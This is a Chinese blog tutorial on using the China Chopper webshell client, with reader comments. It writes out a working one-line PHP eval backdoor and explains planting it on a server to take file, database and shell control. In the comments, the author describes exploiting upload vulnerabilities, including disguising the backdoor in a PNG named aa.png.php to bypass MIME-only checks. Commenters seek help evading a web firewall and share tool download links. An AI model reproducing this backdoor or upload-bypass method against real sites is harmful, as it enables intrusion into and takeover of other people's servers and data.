现在的位置: 首页 -> PHP学习 -> 中国菜刀的功能介绍和使用方法

中国菜刀的功能介绍和使用方法

2013-08-01 20:32评论数 33 ⁄ 被浏览 198115 views+

中国菜刀,一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。


1.中国菜刀支持的服务端脚本:PHP、ASP;

2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。

3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。


今天我只介绍PHP的方法(其他的大同小异)。


首先:我们首先要新建一个php文件,文件名随意取,然后写入一句代码:<?php eval($_POST['ee']); ?>  ;eval()这个函数大家并不陌生吧,就是把里面的字符串作为PHP代码执行。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。如下图:



第二步:打开菜刀这个软件,进入如下界面,右键点击“添加”;如下图:



第三步:此时会弹出一个添加shell的对话框,由图一看出我的 “dxr.php”上传在站点根目录,所以这里的地址填为:http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”,也就是<?php eval($_POST['ee']); ?> 这里的“ee”。下面配置项如果你知道用户名密码就填,不知道,不填,也不会影响文件管理和虚拟终端这两个功能,只是不能查看数据库了。



最后:点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!!


   


所以很多黑站者利用一些网站漏洞,上传一句话木马后,就基本上可以黑下你的站了。中国菜刀,就是这么强大!!


操作效果截图一:


 


操作效果截图二:


 


操作效果截图三:





终于写完了,喜欢的话就支持一下哦,代潇瑞博客,专注于PHP学习!!


最后说明一下:此软件打开时杀毒软件可能会报毒的,我已经用了很多遍,反正都没事。如果你不相信的话,也就不用下载了,呵呵。

 

文章出自:https://www.daixiaorui.com/read/17.html 本站所有文章,除注明出处外皆为原创,转载请注明本文地址,版权所有。

目前有 33 条评论  @我要评论

  1. 33楼雨山 : 2021-09-30 15:36:55 评论说: @回复

    你好,我在自己机器上建了服务器测试了一下,设置也是按照上面做的,但是点击管理文件的时候,弹出个对话框写了HTTP头之类的,然后就关闭了,不知道是怎么回事呢?

  2. 32楼绅士 : 2019-02-01 22:16:44 评论说: @回复

    虽然没看懂,但是感谢就对了

  3. 31楼puli : 2018-12-21 18:27:52 评论说: @回复

    请求超时是什么情况呢?

  4. 30楼ok : 2017-09-14 11:18:21 评论说: @回复

  5. 29楼浅唱春天 : 2017-08-21 22:33:36 评论说: @回复

    楼主,我去试试哈!

  6. 28楼xiaomian : 2017-03-16 21:40:00 评论说: @回复

    你好 可以教我吗 1070234605qq

  7. 27楼QQ363320026 : 2017-03-04 17:43:34 评论说: @回复

    教我怎么绕过安全狗下。。加QQ

  8. 26楼lw124 : 2016-11-09 15:39:26 评论说: @回复

    谢谢分享

  9. 25楼IT共享导航 : 2016-10-06 16:18:19 评论说: @回复

    IT共享导航来访,落伍了三年,才接触站长三年前发布的文章,不过还是很实用,转载了,注明出处了,http://itdh.boqingbokeji.com

  10. 24楼bbz : 2016-07-15 16:52:17 评论说: @回复

    thanks!

  11. 23楼犀利的猫 : 2016-04-20 17:49:30 评论说: @回复

    师傅,我是新手,刚刚测试了 提示网站防火窗怎么办? 可以赐教下吗 我的qq是 396107724

  12. 22楼q556 : 2016-04-11 02:55:49 评论说: @回复

    楼主能加我教教我吗。2734919338我试了很多次就是不行

  13. 21楼maicaidao : 2016-03-21 18:05:37 评论说: @回复

    本站: http://www.maicaidao.top 中国菜刀各版本完全无后门下载 hatchet汉化中文版 中国菜刀自定义后门版 中国菜刀20141213版本(最后一版) 中国菜刀20141213去弹窗 中国菜刀20131215(安全脉搏发布) 中国菜刀20111116 中国菜刀20110811 中国菜刀20100928

  14. 20楼哦哦哦 : 2016-01-28 09:11:09 评论说: @回复

    楼主2213958126 想学习菜刀的用法哦 可以加一下吗

  15. 19楼贝壳 : 2016-01-09 22:18:50 评论说: @回复

    跟着教程试了下自己的网站, 可以加我QQ教教我么 272205810

  16. 18楼我要 : 2015-12-28 01:40:11 评论说: @回复

    楼主,请问中国菜刀在哪里下载啊

  17. 17楼你好 : 2015-11-21 20:25:23 评论说: @回复

    你好,我在自己机器上建了服务器测试了一下,设置也是按照上面做的,但是点击管理文件的时候,弹出个对话框写了HTTP头之类的,然后就关闭了,不知道是怎么回事呢?

  18. 16楼乐活资源 : 2015-08-30 15:05:15 评论说: @回复

    受教了 刚找到一个中国菜刀的网盘下载链接 pan.baidu.com/s/1hqm34nq

  19. 15楼天天想你 : 2015-08-21 16:21:49 评论说: @回复

    可以教我吗?有大大回报。qq 1632998171

  20. 14楼形象 : 2015-06-29 20:06:00 评论说: @回复

    我是新手,可以简单的叫我吗 2478148566

  21. 13楼形象 : 2015-06-29 20:05:14 评论说: @回复

    新手可以叫我吗?

  22. 12楼鱼鱼 : 2015-06-16 15:33:24 评论说: @回复

    弱弱的问下,我用菜刀连接了一个站,看到这个服务器里的其他的网站,可是可以下载文件,却不能修改。文本是0666的都编辑不了呢,一编辑就操作失败。

    回复留言标识 Dai 回复 鱼鱼: 服务器设置了权限。

    2015-06-16 23:21:33  @回复

  23. 11楼刘吉 : 2015-06-15 20:58:55 评论说: @回复

    删不掉信息怎么办?

  24. 10楼想学菜刀 : 2015-06-02 07:17:59 评论说: @回复

    如果可以的话,请加我QQ:1320509 时刻准备着向您请教!

  25. 9楼想学菜刀 : 2015-06-02 07:16:21 评论说: @回复

    我知道网站里已经有一句话了,但不知道具体路径,在菜刀里有什么办法吗?

  26. 8楼邮莓 : 2015-05-28 19:32:06 评论说: @回复

    博主,想请把png格式的带有一句代码的图片,能添加成功吗?

    回复留言标识 Dai 回复 邮莓: 是利用上传漏洞吗?把png图片用记事本或其他代码编辑器打开,再把一句话代码插到里面,最好是中间的位置。如果网站验证上传文件的格式只是单纯的靠验证MIME,而没验证后缀,那么可以将伪装好的图片保存为aa.png.php上传上去,取得“图片”路径后,就可以用菜刀连接了。(这种东西玩玩可以,不要做坏事哦)

    2015-05-28 23:27:04  @回复

    回复留言标识 邮莓 回复 Dai: 呵呵,学习测试用,验后缀,是不玩不了拉?

    2015-05-29 12:15:47  @回复

    回复留言标识 zxc 回复 Dai: 我连接上去后用菜刀打开任何php文件都显示是zend,还有啊朋友,那个管理员用户名在哪里找?

    2016-05-15 20:12:15  @回复

  27. 7楼guochenming : 2015-04-29 10:19:39 评论说: @回复

    能教我一下吗 QQ 5720627 谢谢啦

  28. 6楼guochenming : 2015-04-29 10:19:13 评论说: @回复

    能教我一下吗

  29. 5楼412311 : 2014-07-30 20:06:06 评论说: @回复

    我还是不懂 你加我QQ吧935881081

  30. 4楼张三 : 2013-12-28 21:21:30 评论说: @回复

    这个只能上传达室PHP格式的吗

  31. 3楼张三 : 2013-12-28 21:21:10 评论说: @回复

    这个只能上传PHP格式的吗

    回复留言标识 Dai 回复 张三: 也可以是asp的呢

    2013-12-30 22:04:08  @回复

  32. 2楼hi : 2013-12-12 09:10:34 评论说: @回复

    工具好是好,请问您刚才说新建一个文件,放到站里,既然你能在站里新建文件了,还用菜刀做什么呢?

    回复留言标识 Dai 回复 hi: 我是演示他的功能。正确流程应该是,找到网站漏洞,利用它把一句话木马植入到网站,然后菜刀就可以控制整个站了。只有这样,单纯的菜刀是没法攻击网站的。

    2013-12-12 12:54:43  @回复

  33. 1楼 : 2013-11-22 18:59:03 评论说: @回复

    我好想还是没有学会, 可以加我QQ简单的教我一下吗 1273980723

    回复留言标识 Dai 回复 吖: 嗯,没问题!

    2013-11-22 22:17:23  @回复

您的每一个评论都是对我的一份支持

 博客二维码

昵称 *

邮箱 *